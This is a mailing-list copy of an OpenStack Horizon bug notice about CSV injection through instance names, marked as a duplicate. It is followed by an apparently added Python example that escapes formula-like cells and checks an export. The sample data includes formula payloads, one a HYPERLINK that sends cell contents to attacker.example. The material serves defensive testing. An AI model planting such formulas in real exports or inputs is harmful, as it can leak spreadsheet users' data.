
yahoo-eng-team team mailing list archive

[Bug 1866614] Re: CSV Injection in instance edit form in the name field


*** This bug is a duplicate of bug 1842749 ***
    https://bugs.launchpad.net/bugs/1842749

Since there hasn't been an update to Jeremy's question, we are going to
mark this as a duplicate of bug 1842749 since this appears to be the
same issue.

** This bug has been marked a duplicate of bug 1842749
   CSV Injection Possible in Compute Usage History

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1866614

Title:
  CSV Injection in instance edit form in the name field

Status in OpenStack Dashboard (Horizon):
  New
Status in OpenStack Security Advisory:
  Incomplete

Bug description:
  This is arguably more a problem with Excel or Libre Office or other
  software that indiscriminately executes code in a document it is
  opening, but since we can fix it easily on our side, I think it would
  make sense to do so.

  The gist of it is that it's possible to name an instance in such a
  way that it results in a spreadsheet formula that will be executed
  when the exported CSV file with the list of instances is imported into a
  spreadsheet program. In the case of Microsoft Excel that formula could
  potentially do anything, which is a Bad Thing™, but I don't think they
  will ever fix it, so it's on us to escape such data so that it won't
  be interpreted as formulas.

  This escaping is apparently done by appending a single apostrophe to
  the field's data whenever that data begins with +, -, = or @
  characters. I'm attaching a patch that I think should do it.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1866614/+subscriptions
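The escaping the report describes, as an added Python example (this is not Horizon's code and not the patch attached to the bug): a cell whose text begins with one of the formula-trigger characters gets a single quote put in front of it, which spreadsheet programs read as "treat this cell as literal text". The instance list, the function names and the CSV layout are constructed for the example. It goes slightly beyond the report by also treating a leading tab or carriage return as a trigger, following the OWASP CSV-injection guidance, and it includes a small checker that parses the exported CSV back and lists any cell a spreadsheet would still evaluate.

```python
import csv
import io

# Leading characters that make common spreadsheet programs evaluate a cell
# as a formula. '=', '+', '-' and '@' are the ones named in the bug report;
# tab and carriage return are added here from OWASP's CSV-injection guidance
# (an assumption that goes beyond the report).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value):
    """True when a spreadsheet would interpret this cell text as a formula."""
    return isinstance(value, str) and value.startswith(FORMULA_TRIGGERS)


def escape_csv_field(value):
    """Prefix a single quote so the cell is imported as literal text.

    The quote is placed *before* the data, which is what neutralises the
    formula; non-string and non-formula values are returned unchanged.
    """
    if is_formula_like(value):
        return "'" + value
    return value


def export_instances_csv(instances, escape=True):
    """Render an instance list as CSV text (hypothetical export helper).

    escape=False reproduces the unsafe behaviour the bug report describes;
    escape=True applies escape_csv_field to every cell before writing.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["name", "flavor", "status"])
    for inst in instances:
        row = [inst["name"], inst["flavor"], inst["status"]]
        if escape:
            row = [escape_csv_field(cell) for cell in row]
        writer.writerow(row)
    return buf.getvalue()


def formula_cells(csv_text):
    """Parse CSV text back and return every cell that still looks like a formula.

    This is the check a reviewer would run on an export: after escaping,
    the result must be an empty list.
    """
    rows = list(csv.reader(io.StringIO(csv_text)))
    return [cell for row in rows[1:] for cell in row if is_formula_like(cell)]


# Constructed sample data: one benign instance name and three names that a
# user could type into the instance edit form to produce spreadsheet formulas.
SAMPLE_INSTANCES = [
    {"name": "web-01", "flavor": "m1.small", "status": "ACTIVE"},
    {"name": '=HYPERLINK("http://attacker.example/?"&A1,"click")',
     "flavor": "m1.small", "status": "ACTIVE"},
    {"name": "@SUM(1+1)", "flavor": "m1.medium", "status": "SHUTOFF"},
    {"name": "+1+1", "flavor": "m1.large", "status": "ACTIVE"},
]


if __name__ == "__main__":
    unsafe = export_instances_csv(SAMPLE_INSTANCES, escape=False)
    safe = export_instances_csv(SAMPLE_INSTANCES, escape=True)
    print("cells a spreadsheet would evaluate (unescaped export):")
    for cell in formula_cells(unsafe):
        print("  ", repr(cell))
    print("cells a spreadsheet would evaluate (escaped export):",
          formula_cells(safe))
    print(safe)
```

Two points worth noting when applying this. First, the single quote must be the leading character of the cell, so the escaping has to run on the raw field value before the CSV writer quotes it; the writer's own double-quote handling does not help, since a spreadsheet strips those quotes and then evaluates what is left. Second, the check is applied to every exported column, not only the instance name: any field a user controls (description, metadata, key names) is the same problem, and the cheap parse-back check above catches a column that was missed.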